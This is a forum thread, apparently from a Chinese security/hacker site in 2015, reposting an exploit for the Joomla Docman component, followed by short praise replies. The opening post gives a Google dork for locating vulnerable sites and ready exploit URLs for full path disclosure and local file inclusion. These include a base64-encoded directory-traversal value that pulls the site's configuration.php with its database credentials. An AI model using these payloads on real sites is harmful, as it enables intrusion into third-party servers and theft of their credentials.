楼主: 90_

Joomla Docman Path Disclosure本地包含漏洞

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-7-16 11:46:42 | 显示全部楼层 |阅读模式
    Description:
    Joomla Docman suffers from full path disclosure and local file inclusion vulnerabilities.

    [PHP] 纯文本查看 复制代码
    # Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
    # CWE: CWE-200(FPD) CWE-98(LFI/LFD)
    # Risk: High
    # Author: Hugo Santiago dos Santos
    # Contact: [email]hugo.s@linuxmail.org[/email]<script cf-hash="f9e31" type="text/javascript">
    /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>
    # Date: 13/07/2015
    # Vendor Homepage: [url]http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman[/url]
    # Google Dork: inurl:"/components/com_docman/dl2.php"
     
    # Xploit (FPD): 
      
     Get one target and just download with blank parameter: 
     [url]http://www.site.com/components/com_docman/dl2.php?archive=0&file=[/url]
      
     In title will occur Full Path Disclosure of server.
      
    # Xploit (LFD/LFI):
     
     [url]http://www.site.com/components/com_docman/dl2.php?archive=0&file=[/url][LDF]
      
     Let's Xploit...
      
     First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
      
     ../../../../../../../target/www/configuration.php <= Not Ready
      
     [url]http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==[/url]  <= Ready !
    
    And Now we have a configuration file...
    回复

    使用道具 举报

  • TA的每日心情
    难过
    2016-10-25 18:06
  • 签到天数: 54 天

    [LV.5]常住居民I

    发表于 2015-7-16 13:03:41 | 显示全部楼层
    虽然看不懂  但以我24K肉眼360度观看得出  这是一个漏洞  对就是漏洞
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2023-4-26 23:35
  • 签到天数: 237 天

    [LV.7]常住居民III

    发表于 2015-7-17 07:33:39 | 显示全部楼层
    很好 收藏了                    
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-4-13 21:38
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-7-17 17:35:25 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2015-7-17 21:48:22 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-18 20:37:47 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-19 07:36:26 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-20 00:41:30 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-21 04:14:07 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-21 15:01:04 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 13:11 , Processed in 0.028837 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部